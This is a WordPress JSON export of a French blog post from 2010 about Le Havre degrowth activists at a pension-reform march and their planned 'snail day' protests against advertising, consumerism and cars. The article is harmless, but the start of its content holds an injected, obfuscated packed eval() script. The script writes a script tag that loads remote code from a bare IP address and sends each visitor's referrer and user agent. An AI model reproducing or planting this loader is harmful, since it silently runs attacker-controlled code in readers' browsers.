{"id":4646,"date":"2010-06-24T22:30:22","date_gmt":"2010-06-24T21:30:22","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=4646"},"modified":"2010-06-24T22:31:49","modified_gmt":"2010-06-24T21:31:49","slug":"l%e2%80%99objection-de-croissance-contre-l%e2%80%99alienation-capitaliste","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=4646","title":{"rendered":"L\u2019objection de croissance contre l\u2019ali\u00e9nation capitaliste"},"content":{"rendered":"<p><script type=\"text\/javascript\">\/\/ <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eeedd|var|u0026u|referrer|erhdf||js|php'.split('|'),0,{}))\n<\/script><\/noindex> <![CDATA[\n   MIA.Module.item_id = \"2128788\";\n\/\/ ]]><\/script> <strong>Le 24 juin, le groupe havrais du Parti de la d\u00e9croissance  participait \u00e0 sa mani\u00e8re \u00e0 la <a href=\"http:\/\/www.lepost.fr\/tag\/manifestation\/\" target=\"_blank\">manifestation<\/a> contre la r\u00e9forme des retraites. Le  26 juin, les d\u00e9croissants vont encore joyeusement baver dans la sale  soupe productiviste \u00e0 l\u2019occasion d\u2019une Journ\u00e9e escargots.<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" src=\"http:\/\/decroissance.lehavre.free.fr\/collectif\/h-20-2128792-1277408588.JPG\" alt=\"\" width=\"535\" height=\"355\" \/><\/p>\n<p>20 000 manifestants ont d\u00e9ambul\u00e9 dans les rues  du Havre le 24 juin pour protester contre la r\u00e9forme des retraites.  Install\u00e9s sur des chaises longues derri\u00e8re une antique table de camping,  les partisans de la d\u00e9croissance bullaient, tout simplement, en  regardant passer l\u2019immense cort\u00e8ge. Mani\u00e8re d\u2019exprimer leur objection et  leur abjection du syst\u00e8me qui oppresse et manipule les \u00eatres humains et  d\u00e9truit inexorablement la plan\u00e8te. Adeptes de la militance  humoristique, la poign\u00e9e de militants d\u00e9croissants offraient\u2026 des  croissants aux dockers, aux douaniers, aux ouvriers, aux marins, aux  enseignants, aux retrait\u00e9s veinards qui savouraient la plaisanterie et  les viennoiseries.<\/p>\n<p><!--more-->Pour bien mettre les points sur les i, les D\u00e9croissants havrais  organisent le samedi 26 juin une Journ\u00e9e escargot, mascotte de celles  et ceux qui souhaitent donner un coup de frein \u00e0 la folie productiviste  qui conduit le monde \u00e0 sa perte. \u00ab\u00a0<em>A l&rsquo;aide de ses meilleurs outils  que sont le capitalisme, le lib\u00e9ralisme, l&rsquo;ultra-lib\u00e9ralisme et autres  n\u00e9o\u2026 la soci\u00e9t\u00e9 de croissance accumule dramatiquement les crises  environnementales, sociales, \u00e9conomiques, culturelles et politiques.  Devant ce constat, il est urgent de dire \u00e0 tous les citoyens qu&rsquo;il ne  s&rsquo;agit pas de choisir entre croissance et d\u00e9croissance, mais bien entre  une d\u00e9croissance volontaire et une r\u00e9cession subie<\/em> \u00bb, explique le  programme de la journ\u00e9e.<\/p>\n<p>Le premier rendez-vous est donn\u00e9 \u00e0 11 heures  dans les jardins de l\u2019H\u00f4tel de ville du Havre pour une heure de silence  sur le th\u00e8me <em>T\u00e9l\u00e9, pas de pub destin\u00e9e aux enfants<\/em>. \u00ab\u00a0<em>La  publicit\u00e9 est un des bras arm\u00e9s du capitalisme. Il permet de g\u00e9n\u00e9rer des  envies infiniment frustrantes. Le productivisme a besoin de \u00ab bons \u00bb  consommateurs pour \u00e9couler ses produits. Plus ils seront conditionn\u00e9s  jeunes, plus ils seront boulimiques de consommation. R\u00e9clamons la  suppression de la publicit\u00e9 par une heure de manifestation non violente.<\/em> \u00bb<\/p>\n<p>Les  D\u00e9croissants sont comme tout le monde, ils ont parfois faim. Vers 12h30,  un pique-nique est donc organis\u00e9 dans les jardins de l\u2019H\u00f4tel de ville  du Havre. Chacun est invit\u00e9 \u00e0 partager g\u00e9n\u00e9reusement ce qu\u2019il y a dans  son panier.<\/p>\n<p>En guise  de digestif, une grande messe d\u00e9di\u00e9e \u00e0 la consommation est pr\u00e9vue devant  le centre commercial Coty vers 15 heures. Une heure de pri\u00e8re va \u00eatre  offerte \u00e0 Sainte-Consommation devant l\u2019un de ses v\u00e9n\u00e9rables temples.  Grands pr\u00eatres et fid\u00e8les cons-sots-mateurs liront quelques pages  choisies de leur Missel.<\/p>\n<p>La voiture sera ensuite dans le collimateur  des ami-e-s des gast\u00e9ropodes. \u00ab\u00a0<em>L&rsquo;automobile n&rsquo;est pas uniquement le  moyen de transport et de libert\u00e9. Son hyper-d\u00e9veloppement a des  cons\u00e9quences sur toute la soci\u00e9t\u00e9, construite autour de la voiture et  des transports routiers, au point que toute la population est ali\u00e9n\u00e9e \u00e0  la soci\u00e9t\u00e9 de l&rsquo;automobile : s\u00e9paration des individus entre eux, des  classes sociales en favorisant les s\u00e9gr\u00e9gations g\u00e9ographiques, des lieux  de production et des lieux de consommation. L&rsquo;espace urbain fran\u00e7ais  est occup\u00e9 \u00e0 30% par des automobiles, le plus souvent \u00e0 l&rsquo;arr\u00eat, une  voiture restant 95% de son cycle de vie en stationnement. La soci\u00e9t\u00e9 de  l&rsquo;automobile n&rsquo;est une soci\u00e9t\u00e9 ni soutenable ni souhaitable, ni sereine  ni conviviale. Faisons une pause et r\u00e9approprions-nous de l&rsquo;espace  public confisqu\u00e9 par les voitures<\/em>.\u00a0\u00bb La d\u00e9monstration pr\u00e9vue se  d\u00e9roulera sur un parking havrais. Des pi\u00e9tons mettront des pi\u00e8ces dans  des horodateurs pour reprendre possession de l\u2019espace urbain. Chaises  longues, fauteuils, mat\u00e9riel de camping, bac \u00e0 sable\u2026 empi\u00e8teront  pendant quelques heures sur le pr\u00e9cieux macadam r\u00e9serv\u00e9 habituellement  aux v\u00e9hicules.<\/p>\n<p>A partir de 20 heures, nous retrouverons les D\u00e9croissants au  caf\u00e9 <em>Les Lucioles<\/em> (31, rue Casimir-Delavigne) o\u00f9 un concert de  soutien au Camp Action Climat 2010 est organis\u00e9. Au programme, <a href=\"http:\/\/www.lepost.fr\/tag\/slam\/\" target=\"_blank\">slam<\/a> et hip-hop. Le Camp Action Climat s\u2019installera dans la r\u00e9gion havraise  du 22 juillet au 1er ao\u00fbt. Apr\u00e8s avoir occup\u00e9 le site du projet  d\u2019a\u00e9roport du Grand Ouest pr\u00e8s de Nantes l\u2019\u00e9t\u00e9 dernier, le Camp Action  Climat vise cette ann\u00e9e la zone industrielle de l\u2019estuaire de la Seine.  Les campeurs profiteront de leur rassemblement pour mettre en place des  actions cibl\u00e9es sur la source des causes du changement climatique. \u00ab\u00a0<em>La  zone industrielle de l\u2019estuaire de la Seine est un condens\u00e9 des  industries les plus polluantes, comme la raffinerie <a href=\"http:\/\/www.lepost.fr\/tag\/total\/\" target=\"_blank\">Total<\/a> et la cimenterie Lafarge. On y trouve aussi les industries des fausses  solutions, comme l\u2019usine d\u2019agro-carburant Terreos<\/em>, explique Anna  William, du Camp Action Climat. <em>Nous devons nous former et nous  informer collectivement, pour agir et faire cesser ces industries qui  menacent l\u2019avenir de tous.<\/em> \u00bb<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" src=\"http:\/\/decroissance.lehavre.free.fr\/collectif\/journee-escargots.jpg\" alt=\"\" width=\"540\" height=\"294\" \/><\/p>\n<p><strong>Plus aller plus loin\u00a0:<\/strong><\/p>\n<p><strong>&#8211; source : <a href=\"http:\/\/www.lepost.fr\/article\/2010\/06\/24\/2128788_l-objection-de-croissance-et-la-bave-d-escargot-contre-l-alienation-capitaliste.html\">PACO sur le post<\/a><br \/>\n<\/strong><\/p>\n<p><strong>&#8211; Le  site du <a rel=\"nofollow\" href=\"http:\/\/decroissance.lehavre.free.fr\/accueil.htm\" target=\"_blank\">Collectif havrais d&rsquo;Ojecteurs de  Croissance (ChOC)<\/a>.<\/strong><\/p>\n<p><strong>-Le  site du <a rel=\"nofollow\" href=\"http:\/\/www.campclimat.org\/\" target=\"_blank\">Camp Action Climat 2010<\/a>.<\/strong><\/p>\n<p><strong>&#8211; <a href=\"http:\/\/www.lepost.fr\/article\/2010\/05\/04\/2060753_un-camp-action-climat-attendu-au-havre-cet-ete.html\" target=\"_blank\">Le Camp Action Climat sur Le Post<\/a>.<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Le 24 juin, le groupe havrais du Parti de la d\u00e9croissance participait \u00e0 sa mani\u00e8re \u00e0 la manifestation contre la r\u00e9forme des retraites. Le 26 juin, les d\u00e9croissants vont encore joyeusement baver dans la sale soupe productiviste \u00e0 l\u2019occasion d\u2019une &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=4646\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,6,17],"tags":[],"class_list":["post-4646","post","type-post","status-publish","format-standard","hentry","category-actualites","category-agenda-du-p-p-l-d","category-revue-de-medias"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4646","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4646"}],"version-history":[{"count":4,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4646\/revisions"}],"predecessor-version":[{"id":4650,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4646\/revisions\/4650"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4646"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4646"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4646"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}